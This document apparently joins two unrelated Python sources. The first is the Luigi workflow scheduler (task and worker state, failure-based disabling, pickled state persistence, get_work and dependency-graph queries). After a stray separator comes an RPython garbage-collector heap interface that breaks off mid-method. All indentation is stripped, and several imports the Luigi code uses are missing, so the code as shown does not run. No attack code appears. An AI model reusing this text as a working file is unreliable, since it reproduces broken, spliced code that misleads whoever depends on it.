from luigi.task_status import DISABLED, DONE, FAILED, PENDING, RUNNING, SUSPENDED, UNKNOWN
from luigi.task import Config
logger = logging.getLogger("luigi.server")
class Scheduler(object):
"""
Abstract base class.
Note that the methods all take string arguments, not Task objects...
"""""
add_task = NotImplemented
get_work = NotImplemented
ping = NotImplemented
UPSTREAM_RUNNING = 'UPSTREAM_RUNNING'
UPSTREAM_MISSING_INPUT = 'UPSTREAM_MISSING_INPUT'
UPSTREAM_FAILED = 'UPSTREAM_FAILED'
UPSTREAM_DISABLED = 'UPSTREAM_DISABLED'
UPSTREAM_SEVERITY_ORDER = (
'',
UPSTREAM_RUNNING,
UPSTREAM_MISSING_INPUT,
UPSTREAM_FAILED,
UPSTREAM_DISABLED,
)
UPSTREAM_SEVERITY_KEY = UPSTREAM_SEVERITY_ORDER.index
STATUS_TO_UPSTREAM_MAP = {
FAILED: UPSTREAM_FAILED,
RUNNING: UPSTREAM_RUNNING,
PENDING: UPSTREAM_MISSING_INPUT,
DISABLED: UPSTREAM_DISABLED,
}
class scheduler(Config):
# TODO(erikbern): the config_path is needed for backwards compatilibity. We should drop the compatibility
# at some point (in particular this would force users to replace all dashes with underscores in the config)
retry_delay = parameter.FloatParameter(default=900.0)
remove_delay = parameter.FloatParameter(default=600.0)
worker_disconnect_delay = parameter.FloatParameter(default=60.0)
state_path = parameter.Parameter(default='/var/lib/luigi-server/state.pickle')
# Jobs are disabled if we see more than disable_failures failures in disable_window seconds.
# These disables last for disable_persist seconds.
disable_window = parameter.IntParameter(default=3600,
config_path=dict(section='scheduler', name='disable-window-seconds'))
disable_failures = parameter.IntParameter(default=None,
config_path=dict(section='scheduler', name='disable-num-failures'))
disable_hard_timeout = parameter.IntParameter(default=None,
config_path=dict(section='scheduler', name='disable-hard-timeout'))
disable_persist = parameter.IntParameter(default=86400,
config_path=dict(section='scheduler', name='disable-persist-seconds'))
max_shown_tasks = parameter.IntParameter(default=100000)
prune_done_tasks = parameter.BoolParameter(default=False)
record_task_history = parameter.BoolParameter(default=False)
visualization_graph = parameter.Parameter(default="svg", config_path=dict(section='scheduler', name='visualization-graph'))
prune_on_get_work = parameter.BoolParameter(default=False)
def fix_time(x):
# Backwards compatibility for a fix in Dec 2014. Prior to the fix, pickled state might store datetime objects
# Let's remove this function soon
if isinstance(x, datetime.datetime):
return time.mktime(x.timetuple())
else:
return x
class Failures(object):
"""
This class tracks the number of failures in a given time window.
Failures added are marked with the current timestamp, and this class counts
the number of failures in a sliding time window ending at the present.
"""
def __init__(self, window):
"""
Initialize with the given window.
:param window: how long to track failures for, as a float (number of seconds).
"""
self.window = window
self.failures = collections.deque()
self.first_failure_time = None
def add_failure(self):
"""
Add a failure event with the current timestamp.
"""
failure_time = time.time()
if not self.first_failure_time:
self.first_failure_time = failure_time
self.failures.append(failure_time)
def num_failures(self):
"""
Return the number of failures in the window.
"""
min_time = time.time() - self.window
while self.failures and fix_time(self.failures[0]) < min_time:
self.failures.popleft()
return len(self.failures)
def clear(self):
"""
Clear the failure queue.
"""
self.failures.clear()
def _get_default(x, default):
if x is not None:
return x
else:
return default
class Task(object):
def __init__(self, task_id, status, deps, resources=None, priority=0, family='', module=None,
params=None, disable_failures=None, disable_window=None, disable_hard_timeout=None):
self.id = task_id
self.stakeholders = set() # workers ids that are somehow related to this task (i.e. don't prune while any of these workers are still active)
self.workers = set() # workers ids that can perform task - task is 'BROKEN' if none of these workers are active
if deps is None:
self.deps = set()
else:
self.deps = set(deps)
self.status = status # PENDING, RUNNING, FAILED or DONE
self.time = time.time() # Timestamp when task was first added
self.retry = None
self.remove = None
self.worker_running = None # the worker id that is currently running the task or None
self.time_running = None # Timestamp when picked up by worker
self.expl = None
self.priority = priority
self.resources = _get_default(resources, {})
self.family = family
self.module = module
self.params = _get_default(params, {})
self.disable_failures = disable_failures
self.disable_hard_timeout = disable_hard_timeout
self.failures = Failures(disable_window)
self.scheduler_disable_time = None
def __repr__(self):
return "Task(%r)" % vars(self)
def add_failure(self):
self.failures.add_failure()
def has_excessive_failures(self):
excessive_failures = False
if (self.failures.first_failure_time is not None and
self.disable_hard_timeout):
if (time.time() >= self.failures.first_failure_time +
self.disable_hard_timeout):
excessive_failures = True
if self.failures.num_failures() >= self.disable_failures:
excessive_failures = True
return excessive_failures
def can_disable(self):
return (self.disable_failures is not None or
self.disable_hard_timeout is not None)
class Worker(object):
"""
Structure for tracking worker activity and keeping their references.
"""
def __init__(self, worker_id, last_active=None):
self.id = worker_id
self.reference = None # reference to the worker in the real world. (Currently a dict containing just the host)
self.last_active = last_active or time.time() # seconds since epoch
self.started = time.time() # seconds since epoch
self.tasks = set() # task objects
self.info = {}
def add_info(self, info):
self.info.update(info)
def update(self, worker_reference):
if worker_reference:
self.reference = worker_reference
self.last_active = time.time()
def prune(self, config):
# Delete workers that haven't said anything for a while (probably killed)
if self.last_active + config.worker_disconnect_delay < time.time():
return True
def get_pending_tasks(self, state):
"""
Get PENDING (and RUNNING) tasks for this worker.
You have to pass in the state for optimization reasons.
"""
if len(self.tasks) < state.num_pending_tasks():
return six.moves.filter(lambda task: task.status in [PENDING, RUNNING],
self.tasks)
else:
return state.get_pending_tasks()
def is_trivial_worker(self, state):
"""
If it's not an assistant having only tasks that are without
requirements.
We have to pass the state parameter for optimization reasons.
"""
if self.assistant:
return False
return all(not task.resources for task in self.get_pending_tasks(state))
@property
def assistant(self):
return self.info.get('assistant', False)
def __str__(self):
return self.id
class SimpleTaskState(object):
"""
Keep track of the current state and handle persistance.
The point of this class is to enable other ways to keep state, eg. by using a database
These will be implemented by creating an abstract base class that this and other classes
inherit from.
"""
def __init__(self, state_path):
self._state_path = state_path
self._tasks = {} # map from id to a Task object
self._status_tasks = collections.defaultdict(dict)
self._active_workers = {} # map from id to a Worker object
def dump(self):
state = (self._tasks, self._active_workers)
try:
with open(self._state_path, 'wb') as fobj:
pickle.dump(state, fobj)
except IOError:
logger.warning("Failed saving scheduler state", exc_info=1)
else:
logger.info("Saved state in %s", self._state_path)
# prone to lead to crashes when old state is unpickled with updated code. TODO some kind of version control?
def load(self):
if os.path.exists(self._state_path):
logger.info("Attempting to load state from %s", self._state_path)
try:
with open(self._state_path, 'rb') as fobj:
state = pickle.load(fobj)
except BaseException:
logger.exception("Error when loading state. Starting from clean slate.")
return
self._tasks, self._active_workers = state
self._status_tasks = collections.defaultdict(dict)
for task in six.itervalues(self._tasks):
self._status_tasks[task.status][task.id] = task
# Convert from old format
# TODO: this is really ugly, we need something more future-proof
# Every time we add an attribute to the Worker class, this code needs to be updated
for k, v in six.iteritems(self._active_workers):
if isinstance(v, float):
self._active_workers[k] = Worker(worker_id=k, last_active=v)
if any(not hasattr(w, 'tasks') for k, w in six.iteritems(self._active_workers)):
# If you load from an old format where Workers don't contain tasks.
for k, worker in six.iteritems(self._active_workers):
worker.tasks = set()
for task in six.itervalues(self._tasks):
for worker_id in task.workers:
self._active_workers[worker_id].tasks.add(task)
else:
logger.info("No prior state file exists at %s. Starting with clean slate", self._state_path)
def get_active_tasks(self, status=None):
if status:
for task in six.itervalues(self._status_tasks[status]):
yield task
else:
for task in six.itervalues(self._tasks):
yield task
def get_running_tasks(self):
return six.itervalues(self._status_tasks[RUNNING])
def get_pending_tasks(self):
return itertools.chain.from_iterable(six.itervalues(self._status_tasks[status])
for status in [PENDING, RUNNING])
def num_pending_tasks(self):
"""
Return how many tasks are PENDING + RUNNING. O(1).
"""
return len(self._status_tasks[PENDING]) + len(self._status_tasks[RUNNING])
def get_task(self, task_id, default=None, setdefault=None):
if setdefault:
task = self._tasks.setdefault(task_id, setdefault)
self._status_tasks[task.status][task.id] = task
return task
else:
return self._tasks.get(task_id, default)
def has_task(self, task_id):
return task_id in self._tasks
def re_enable(self, task, config=None):
task.scheduler_disable_time = None
task.failures.clear()
if config:
self.set_status(task, FAILED, config)
task.failures.clear()
def set_status(self, task, new_status, config=None):
if new_status == FAILED:
assert config is not None
# not sure why we have SUSPENDED, as it can never be set
if new_status == SUSPENDED:
new_status = PENDING
if new_status == DISABLED and task.status == RUNNING:
return
if task.status == DISABLED:
if new_status == DONE:
self.re_enable(task)
# don't allow workers to override a scheduler disable
elif task.scheduler_disable_time is not None:
return
if new_status == FAILED and task.can_disable():
task.add_failure()
if task.has_excessive_failures():
task.scheduler_disable_time = time.time()
new_status = DISABLED
notifications.send_error_email(
'Luigi Scheduler: DISABLED {task} due to excessive failures'.format(task=task.id),
'{task} failed {failures} times in the last {window} seconds, so it is being '
'disabled for {persist} seconds'.format(
failures=config.disable_failures,
task=task.id,
window=config.disable_window,
persist=config.disable_persist,
))
elif new_status == DISABLED:
task.scheduler_disable_time = None
self._status_tasks[task.status].pop(task.id)
self._status_tasks[new_status][task.id] = task
task.status = new_status
def prune(self, task, config, assistants):
remove = False
# Mark tasks with no remaining active stakeholders for deletion
if not task.stakeholders:
if task.remove is None:
logger.info("Task %r has stakeholders %r but none remain connected -> will remove "
"task in %s seconds", task.id, task.stakeholders, config.remove_delay)
task.remove = time.time() + config.remove_delay
# If a running worker disconnects, tag all its jobs as FAILED and subject it to the same retry logic
if task.status == RUNNING and task.worker_running and task.worker_running not in task.stakeholders | assistants:
logger.info("Task %r is marked as running by disconnected worker %r -> marking as "
"FAILED with retry delay of %rs", task.id, task.worker_running,
config.retry_delay)
task.worker_running = None
self.set_status(task, FAILED, config)
task.retry = time.time() + config.retry_delay
# Re-enable task after the disable time expires
if task.status == DISABLED and task.scheduler_disable_time:
if time.time() - fix_time(task.scheduler_disable_time) > config.disable_persist:
self.re_enable(task, config)
# Remove tasks that have no stakeholders
if task.remove and time.time() > task.remove:
logger.info("Removing task %r (no connected stakeholders)", task.id)
remove = True
# Reset FAILED tasks to PENDING if max timeout is reached, and retry delay is >= 0
if task.status == FAILED and config.retry_delay >= 0 and task.retry < time.time():
self.set_status(task, PENDING, config)
return remove
def inactivate_tasks(self, delete_tasks):
# The terminology is a bit confusing: we used to "delete" tasks when they became inactive,
# but with a pluggable state storage, you might very well want to keep some history of
# older tasks as well. That's why we call it "inactivate" (as in the verb)
for task in delete_tasks:
task_obj = self._tasks.pop(task)
self._status_tasks[task_obj.status].pop(task)
def get_active_workers(self, last_active_lt=None):
for worker in six.itervalues(self._active_workers):
if last_active_lt is not None and worker.last_active >= last_active_lt:
continue
yield worker
def get_assistants(self, last_active_lt=None):
return filter(lambda w: w.assistant, self.get_active_workers(last_active_lt))
def get_worker_ids(self):
return self._active_workers.keys() # only used for unit tests
def get_worker(self, worker_id):
return self._active_workers.setdefault(worker_id, Worker(worker_id))
def inactivate_workers(self, delete_workers):
# Mark workers as inactive
for worker in delete_workers:
self._active_workers.pop(worker)
# remove workers from tasks
for task in self.get_active_tasks():
task.stakeholders.difference_update(delete_workers)
task.workers.difference_update(delete_workers)
def get_necessary_tasks(self):
necessary_tasks = set()
for task in self.get_active_tasks():
if task.status not in (DONE, DISABLED) or \
getattr(task, 'scheduler_disable_time', None) is not None:
necessary_tasks.update(task.deps)
necessary_tasks.add(task.id)
return necessary_tasks
class CentralPlannerScheduler(Scheduler):
"""
Async scheduler that can handle multiple workers, etc.
Can be run locally or on a server (using RemoteScheduler + server.Server).
"""
def __init__(self, config=None, resources=None, task_history_impl=None, **kwargs):
"""
Keyword Arguments:
:param config: an object of class "scheduler" or None (in which the global instance will be used)
:param resources: a dict of str->int constraints
:param task_history_override: ignore config and use this object as the task history
"""
self._config = config or scheduler(**kwargs)
self._state = SimpleTaskState(self._config.state_path)
if task_history_impl:
self._task_history = task_history_impl
elif self._config.record_task_history:
from luigi import db_task_history # Needs sqlalchemy, thus imported here
self._task_history = db_task_history.DbTaskHistory()
else:
self._task_history = history.NopHistory()
self._resources = resources or configuration.get_config().getintdict('resources') # TODO: Can we make this a Parameter?
self._make_task = functools.partial(
Task, disable_failures=self._config.disable_failures,
disable_hard_timeout=self._config.disable_hard_timeout,
disable_window=self._config.disable_window)
def load(self):
self._state.load()
def dump(self):
self._state.dump()
def prune(self):
logger.info("Starting pruning of task graph")
remove_workers = []
for worker in self._state.get_active_workers():
if worker.prune(self._config):
logger.info("Worker %s timed out (no contact for >=%ss)", worker, self._config.worker_disconnect_delay)
remove_workers.append(worker.id)
self._state.inactivate_workers(remove_workers)
assistant_ids = set(w.id for w in self._state.get_assistants())
remove_tasks = []
if assistant_ids:
necessary_tasks = self._state.get_necessary_tasks()
else:
necessary_tasks = ()
for task in self._state.get_active_tasks():
if task.id not in necessary_tasks and self._state.prune(task, self._config, assistant_ids):
remove_tasks.append(task.id)
self._state.inactivate_tasks(remove_tasks)
logger.info("Done pruning task graph")
def update(self, worker_id, worker_reference=None):
"""
Keep track of whenever the worker was last active.
"""
worker = self._state.get_worker(worker_id)
worker.update(worker_reference)
def _update_priority(self, task, prio, worker):
"""
Update priority of the given task.
Priority can only be increased.
If the task doesn't exist, a placeholder task is created to preserve priority when the task is later scheduled.
"""
task.priority = prio = max(prio, task.priority)
for dep in task.deps or []:
t = self._state.get_task(dep)
if t is not None and prio > t.priority:
self._update_priority(t, prio, worker)
def add_task(self, task_id=None, status=PENDING, runnable=True,
deps=None, new_deps=None, expl=None, resources=None,
priority=0, family='', module=None, params=None,
assistant=False, **kwargs):
"""
* add task identified by task_id if it doesn't exist
* if deps is not None, update dependency list
* update status of task
* add additional workers/stakeholders
* update priority when needed
"""
worker_id = kwargs['worker']
self.update(worker_id)
task = self._state.get_task(task_id, setdefault=self._make_task(
task_id=task_id, status=PENDING, deps=deps, resources=resources,
priority=priority, family=family, module=module, params=params))
# for setting priority, we'll sometimes create tasks with unset family and params
if not task.family:
task.family = family
if not getattr(task, 'module', None):
task.module = module
if not task.params:
task.params = _get_default(params, {})
if task.remove is not None:
task.remove = None # unmark task for removal so it isn't removed after being added
if not (task.status == RUNNING and status == PENDING):
# don't allow re-scheduling of task while it is running, it must either fail or succeed first
if status == PENDING or status != task.status:
# Update the DB only if there was a acctual change, to prevent noise.
# We also check for status == PENDING b/c that's the default value
# (so checking for status != task.status woule lie)
self._update_task_history(task_id, status)
self._state.set_status(task, PENDING if status == SUSPENDED else status, self._config)
if status == FAILED:
task.retry = time.time() + self._config.retry_delay
if deps is not None:
task.deps = set(deps)
if new_deps is not None:
task.deps.update(new_deps)
if resources is not None:
task.resources = resources
if not assistant:
task.stakeholders.add(worker_id)
# Task dependencies might not exist yet. Let's create dummy tasks for them for now.
# Otherwise the task dependencies might end up being pruned if scheduling takes a long time
for dep in task.deps or []:
t = self._state.get_task(dep, setdefault=self._make_task(task_id=dep, status=UNKNOWN, deps=None, priority=priority))
t.stakeholders.add(worker_id)
self._update_priority(task, priority, worker_id)
if runnable:
task.workers.add(worker_id)
self._state.get_worker(worker_id).tasks.add(task)
if expl is not None:
task.expl = expl
def add_worker(self, worker, info, **kwargs):
self._state.get_worker(worker).add_info(info)
def update_resources(self, **resources):
if self._resources is None:
self._resources = {}
self._resources.update(resources)
def _has_resources(self, needed_resources, used_resources):
if needed_resources is None:
return True
available_resources = self._resources or {}
for resource, amount in six.iteritems(needed_resources):
if amount + used_resources[resource] > available_resources.get(resource, 1):
return False
return True
def _used_resources(self):
used_resources = collections.defaultdict(int)
if self._resources is not None:
for task in self._state.get_active_tasks():
if task.status == RUNNING and task.resources:
for resource, amount in six.iteritems(task.resources):
used_resources[resource] += amount
return used_resources
def _rank(self, among_tasks):
"""
Return worker's rank function for task scheduling.
:return:
"""
dependents = collections.defaultdict(int)
def not_done(t):
task = self._state.get_task(t, default=None)
return task is None or task.status != DONE
for task in among_tasks:
if task.status != DONE:
deps = list(filter(not_done, task.deps))
inverse_num_deps = 1.0 / max(len(deps), 1)
for dep in deps:
dependents[dep] += inverse_num_deps
return lambda task: (task.priority, dependents[task.id], -task.time)
def _schedulable(self, task):
if task.status != PENDING:
return False
for dep in task.deps:
dep_task = self._state.get_task(dep, default=None)
if dep_task is None or dep_task.status != DONE:
return False
return True
def get_work(self, host=None, assistant=False, **kwargs):
# TODO: remove any expired nodes
# Algo: iterate over all nodes, find the highest priority node no dependencies and available
# resources.
# Resource checking looks both at currently available resources and at which resources would
# be available if all running tasks died and we rescheduled all workers greedily. We do both
# checks in order to prevent a worker with many low-priority tasks from starving other
# workers with higher priority tasks that share the same resources.
# TODO: remove tasks that can't be done, figure out if the worker has absolutely
# nothing it can wait for
if self._config.prune_on_get_work:
self.prune()
worker_id = kwargs['worker']
# Return remaining tasks that have no FAILED descendents
self.update(worker_id, {'host': host})
if assistant:
self.add_worker(worker_id, [('assistant', assistant)])
best_task = None
locally_pending_tasks = 0
running_tasks = []
upstream_table = {}
greedy_resources = collections.defaultdict(int)
n_unique_pending = 0
worker = self._state.get_worker(worker_id)
if worker.is_trivial_worker(self._state):
relevant_tasks = worker.get_pending_tasks(self._state)
used_resources = collections.defaultdict(int)
greedy_workers = dict() # If there's no resources, then they can grab any task
else:
relevant_tasks = self._state.get_pending_tasks()
used_resources = self._used_resources()
greedy_workers = dict((worker.id, worker.info.get('workers', 1))
for worker in self._state.get_active_workers())
tasks = list(relevant_tasks)
tasks.sort(key=self._rank(among_tasks=tasks), reverse=True)
for task in tasks:
upstream_status = self._upstream_status(task.id, upstream_table)
in_workers = (assistant and task.workers) or worker_id in task.workers
if task.status == RUNNING and in_workers:
# Return a list of currently running tasks to the client,
# makes it easier to troubleshoot
other_worker = self._state.get_worker(task.worker_running)
more_info = {'task_id': task.id, 'worker': str(other_worker)}
if other_worker is not None:
more_info.update(other_worker.info)
running_tasks.append(more_info)
if task.status == PENDING and in_workers and upstream_status != UPSTREAM_DISABLED:
locally_pending_tasks += 1
if len(task.workers) == 1 and not assistant:
n_unique_pending += 1
if task.status == RUNNING and (task.worker_running in greedy_workers):
greedy_workers[task.worker_running] -= 1
for resource, amount in six.iteritems((task.resources or {})):
greedy_resources[resource] += amount
if not best_task and self._schedulable(task) and self._has_resources(task.resources, greedy_resources):
if in_workers and self._has_resources(task.resources, used_resources):
best_task = task
else:
workers = itertools.chain(task.workers, [worker_id]) if assistant else task.workers
for task_worker in workers:
if greedy_workers.get(task_worker, 0) > 0:
# use up a worker
greedy_workers[task_worker] -= 1
# keep track of the resources used in greedy scheduling
for resource, amount in six.iteritems((task.resources or {})):
greedy_resources[resource] += amount
break
reply = {'n_pending_tasks': locally_pending_tasks,
'running_tasks': running_tasks,
'task_id': None,
'n_unique_pending': n_unique_pending}
if best_task:
self._state.set_status(best_task, RUNNING, self._config)
best_task.worker_running = worker_id
best_task.time_running = time.time()
self._update_task_history(best_task.id, RUNNING, host=host)
reply['task_id'] = best_task.id
reply['task_family'] = best_task.family
reply['task_module'] = getattr(best_task, 'module', None)
reply['task_params'] = best_task.params
return reply
def ping(self, **kwargs):
worker_id = kwargs['worker']
self.update(worker_id)
def _upstream_status(self, task_id, upstream_status_table):
if task_id in upstream_status_table:
return upstream_status_table[task_id]
elif self._state.has_task(task_id):
task_stack = [task_id]
while task_stack:
dep_id = task_stack.pop()
if self._state.has_task(dep_id):
dep = self._state.get_task(dep_id)
if dep_id not in upstream_status_table:
if dep.status == PENDING and dep.deps:
task_stack = task_stack + [dep_id] + list(dep.deps)
upstream_status_table[dep_id] = '' # will be updated postorder
else:
dep_status = STATUS_TO_UPSTREAM_MAP.get(dep.status, '')
upstream_status_table[dep_id] = dep_status
elif upstream_status_table[dep_id] == '' and dep.deps:
# This is the postorder update step when we set the
# status based on the previously calculated child elements
upstream_status = [upstream_status_table.get(task_id, '') for task_id in dep.deps]
upstream_status.append('') # to handle empty list
status = max(upstream_status, key=UPSTREAM_SEVERITY_KEY)
upstream_status_table[dep_id] = status
return upstream_status_table[dep_id]
def _serialize_task(self, task_id, include_deps=True):
task = self._state.get_task(task_id)
ret = {
'status': task.status,
'workers': list(task.workers),
'worker_running': task.worker_running,
'time_running': getattr(task, "time_running", None),
'start_time': task.time,
'params': task.params,
'name': task.family,
'priority': task.priority,
'resources': task.resources,
}
if task.status == DISABLED:
ret['re_enable_able'] = task.scheduler_disable_time is not None
if include_deps:
ret['deps'] = list(task.deps)
return ret
def graph(self, **kwargs):
self.prune()
serialized = {}
for task in self._state.get_active_tasks():
serialized[task.id] = self._serialize_task(task.id)
return serialized
def _recurse_deps(self, task_id, serialized):
if task_id not in serialized:
task = self._state.get_task(task_id)
if task is None or not task.family:
logger.warn('Missing task for id [%s]', task_id)
# try to infer family and params from task_id
try:
family, _, param_str = task_id.rstrip(')').partition('(')
params = dict(param.split('=') for param in param_str.split(', '))
except BaseException:
family, params = '', {}
serialized[task_id] = {
'deps': [],
'status': UNKNOWN,
'workers': [],
'start_time': UNKNOWN,
'params': params,
'name': family,
'priority': 0,
}
else:
serialized[task_id] = self._serialize_task(task_id)
for dep in task.deps:
self._recurse_deps(dep, serialized)
def dep_graph(self, task_id, **kwargs):
self.prune()
serialized = {}
if self._state.has_task(task_id):
self._recurse_deps(task_id, serialized)
return serialized
def task_list(self, status, upstream_status, limit=True, search=None, **kwargs):
"""
Query for a subset of tasks by status.
"""
self.prune()
result = {}
upstream_status_table = {} # used to memoize upstream status
if search is None:
filter_func = lambda _: True
else:
terms = search.split()
filter_func = lambda t: all(term in t.id for term in terms)
for task in filter(filter_func, self._state.get_active_tasks(status)):
if (task.status != PENDING or not upstream_status or
upstream_status == self._upstream_status(task.id, upstream_status_table)):
serialized = self._serialize_task(task.id, False)
result[task.id] = serialized
if limit and len(result) > self._config.max_shown_tasks:
return {'num_tasks': len(result)}
return result
def worker_list(self, include_running=True, **kwargs):
self.prune()
workers = [
dict(
name=worker.id,
last_active=worker.last_active,
started=getattr(worker, 'started', None),
**worker.info
) for worker in self._state.get_active_workers()]
workers.sort(key=lambda worker: worker['started'], reverse=True)
if include_running:
running = collections.defaultdict(dict)
num_pending = collections.defaultdict(int)
num_uniques = collections.defaultdict(int)
for task in self._state.get_pending_tasks():
if task.status == RUNNING and task.worker_running:
running[task.worker_running][task.id] = self._serialize_task(task.id, False)
elif task.status == PENDING:
for worker in task.workers:
num_pending[worker] += 1
if len(task.workers) == 1:
num_uniques[list(task.workers)[0]] += 1
for worker in workers:
tasks = running[worker['name']]
worker['num_running'] = len(tasks)
worker['num_pending'] = num_pending[worker['name']]
worker['num_uniques'] = num_uniques[worker['name']]
worker['running'] = tasks
return workers
def inverse_dep_graph(self, task_id, **kwargs):
self.prune()
serialized = {}
if self._state.has_task(task_id):
self._traverse_inverse_deps(task_id, serialized)
return serialized
def _traverse_inverse_deps(self, task_id, serialized):
stack = [task_id]
serialized[task_id] = self._serialize_task(task_id)
while len(stack) > 0:
curr_id = stack.pop()
for task in self._state.get_active_tasks():
if curr_id in task.deps:
serialized[curr_id]["deps"].append(task.id)
if task.id not in serialized:
serialized[task.id] = self._serialize_task(task.id)
serialized[task.id]["deps"] = []
stack.append(task.id)
def task_search(self, task_str, **kwargs):
"""
Query for a subset of tasks by task_id.
:param task_str:
:return:
"""
self.prune()
result = collections.defaultdict(dict)
for task in self._state.get_active_tasks():
if task.id.find(task_str) != -1:
serialized = self._serialize_task(task.id, False)
result[task.status][task.id] = serialized
return result
def re_enable_task(self, task_id):
serialized = {}
task = self._state.get_task(task_id)
if task and task.status == DISABLED and task.scheduler_disable_time:
self._state.re_enable(task, self._config)
serialized = self._serialize_task(task_id)
return serialized
def fetch_error(self, task_id, **kwargs):
if self._state.has_task(task_id):
return {"taskId": task_id, "error": self._state.get_task(task_id).expl}
else:
return {"taskId": task_id, "error": ""}
def _update_task_history(self, task_id, status, host=None):
try:
if status == DONE or status == FAILED:
successful = (status == DONE)
self._task_history.task_finished(task_id, successful)
elif status == PENDING:
self._task_history.task_scheduled(task_id)
elif status == RUNNING:
self._task_history.task_started(task_id, host)
except BaseException:
logger.warning("Error saving Task history", exc_info=True)
@property
def task_history(self):
# Used by server.py to expose the calls
return self._task_history
| |
from rpython.translator.backendopt.finalizer import FinalizerAnalyzer
from rpython.rtyper.lltypesystem import lltype, llmemory, llheap
from rpython.rtyper import llinterp, rclass
from rpython.rtyper.annlowlevel import llhelper, cast_nongc_instance_to_adr
from rpython.memory import gctypelayout
from rpython.flowspace.model import Constant
class GCManagedHeap(object):
def __init__(self, llinterp, flowgraphs, gc_class, GC_PARAMS={}):
translator = llinterp.typer.annotator.translator
config = translator.config.translation
self.gc = gc_class(config,
chunk_size = 10,
translated_to_c = False,
**GC_PARAMS)
self.translator = translator
self.gc.set_root_walker(LLInterpRootWalker(self))
self.gc.DEBUG = True
self.llinterp = llinterp
self.prepare_graphs(flowgraphs)
self.gc.setup()
self.has_write_barrier_from_array = hasattr(self.gc,
'write_barrier_from_array')
def prepare_graphs(self, flowgraphs):
lltype2vtable = self.llinterp.typer.lltype2vtable
layoutbuilder = DirectRunLayoutBuilder(self.gc.__class__,
lltype2vtable,
self.llinterp)
self.get_type_id = layoutbuilder.get_type_id
gcdata = layoutbuilder.initialize_gc_query_function(self.gc)
self.gcdata = gcdata
self.finalizer_queue_indexes = {}
self.finalizer_handlers = []
self.update_finalizer_handlers()
constants = collect_constants(flowgraphs)
for obj in constants:
TYPE = lltype.typeOf(obj)
layoutbuilder.consider_constant(TYPE, obj, self.gc)
self.constantroots = layoutbuilder.addresses_of_static_ptrs
self.constantrootsnongc = layoutbuilder.addresses_of_static_ptrs_in_nongc
self.prepare_custom_trace_funcs(gcdata)
self._all_prebuilt_gc = layoutbuilder.all_prebuilt_gc
def prepare_custom_trace_funcs(self, gcdata):
custom_trace_funcs = self.llinterp.typer.custom_trace_funcs
def custom_trace(obj, typeid, callback, arg):
for TP, func in custom_trace_funcs:
if typeid == self.get_type_id(TP):
func(self.gc, obj, callback, arg)
return
else:
assert False
for TP, func in custom_trace_funcs:
gcdata._has_got_custom_trace(self.get_type_id(TP))
self.gc.custom_trace_dispatcher = custom_trace
# ____________________________________________________________
#
# Interface for the llinterp
#
def malloc(self, TYPE, n=None, flavor='gc', zero=False,
track_allocation=True):
if flavor == 'gc':
typeid = self.get_type_id(TYPE)
addr = self.gc.malloc(typeid, n, zero=zero)
result = llmemory.cast_adr_to_ptr(addr, lltype.Ptr(TYPE))
if not self.gc.malloc_zero_filled:
gctypelayout.zero_gc_pointers(result)
return result
else:
return lltype.malloc(TYPE, n, flavor=flavor, zero=zero,
track_allocation=track_allocation)
def gettypeid(self, obj):
return self.get_type_id(lltype.typeOf(obj).TO)
def add_memory_pressure(self, size):
if hasattr(self.gc, 'raw_malloc_memory_pressure'):
self.gc.raw_malloc_memory_pressure(size)
def shrink_array(self, p, smallersize):
if hasattr(self.gc, 'shrink_array'):
addr = llmemory.cast_ptr_to_adr(p)
return self.gc.shrink_array(addr, smallersize)
return False
def free(self, TYPE, flavor='gc', track_allocation=True):
assert flavor != 'gc'
return lltype.free(TYPE, flavor=flavor,
track_allocation=track_allocation)
def setfield(self, obj, fieldname, fieldvalue):
STRUCT = lltype.typeOf(obj).TO
addr = llmemory.cast_ptr_to_adr(obj)
addr += llmemory.offsetof(STRUCT, fieldname)
self.setinterior(obj, addr, getattr(STRUCT, fieldname), fieldvalue)
def setarrayitem(self, array, index, newitem):
ARRAY = lltype.typeOf(array).TO
addr = llmemory.cast_ptr_to_adr(array)
addr += llmemory.itemoffsetof(ARRAY, index)
self.setinterior(array, addr, ARRAY.OF, newitem, (index,))
def setinterior(self, toplevelcontainer, inneraddr, INNERTYPE, newvalue,
offsets=()):
if (lltype.typeOf(toplevelcontainer).TO._gckind == 'gc' and
isinstance(INNERTYPE, lltype.Ptr) and INNERTYPE.TO._gckind == 'gc'):
#
wb = True
if self.has_write_barrier_from_array:
for index in offsets:
if type(index) is not str:
assert (type(index) is int # <- fast path
or lltype.typeOf(index) == lltype.Signed)
self.gc.write_barrier_from_array(
llmemory.cast_ptr_to_adr(toplevelcontainer),
index)
wb = False
break
#
if wb:
self.gc.write_barrier(
llmemory.cast_ptr_to_adr(toplevelcontainer))
llheap.setinterior(toplevelcontainer, inneraddr, INNERTYPE, newvalue)
def collect(self, *gen):
self.gc.collect(*gen)
def can_move(self, addr):
return self.gc.can_move(addr)
def pin(self, addr):
return self.gc.pin(addr)
def unpin(self, addr):
self.gc.unpin(addr)
def _is_pinned(self, addr):
return self.gc._is_pinned(addr)
def weakref_create_getlazy(self, objgetter):
# we have to be lazy in reading the llinterp variable containing
# the 'obj' pointer, because the gc.malloc() call below could
# move it around
type_id = self.get_type_id(gctypelayout.WEAKREF)
addr = self.gc.malloc(type_id, None, zero=False)
result = llmemory.cast_adr_to_ptr(addr, gctypelayout.WEAKREFPTR)
result.weakptr = llmemory.cast_ptr_to_adr(objgetter())
return llmemory.cast_ptr_to_weakrefptr(result)
def weakref_deref(self, PTRTYPE, obj):
addr = gctypelayout.ll_weakref_deref(obj)
return llmemory.cast_adr_to_ptr(addr, PTRTYPE)
def gc_id(self, ptr):
ptr = lltype.cast_opaque_ptr(llmemory.GCREF, ptr)
return self.gc.id(ptr)
def writebarrier_before_copy(self, source, dest,
source_start, dest_start, length):
if self.gc.needs_write_barrier:
source_addr = llmemory.cast_ptr_to_adr(source)
dest_addr = llmemory.cast_ptr_to_adr(dest)
return self.gc.writebarrier_before_copy(source_addr, dest_addr,
source_start, dest_start,
length)
else:
return True
def gcflag_extra(self, subopnum, *args):
if subopnum == 1: # has_gcflag_extra
assert len(args) == 0
return self.gc.gcflag_extra != 0
assert len(args) == 1
addr = llmemory.cast_ptr_to_adr(args[0])
hdr = self.gc.header(addr)
if subopnum == 3: # toggle_gcflag_extra
if hdr.tid & self.gc.gcflag_extra:
hdr.tid &= ~self.gc.gcflag_extra
else:
hdr.tid |= self.gc.gcflag_extra
return (hdr.tid & self.gc.gcflag_extra) != 0
def thread_run(self):
pass
def _get_finalizer_trigger(self, fq):
graph = self.translator._graphof(fq.finalizer_trigger.im_func)
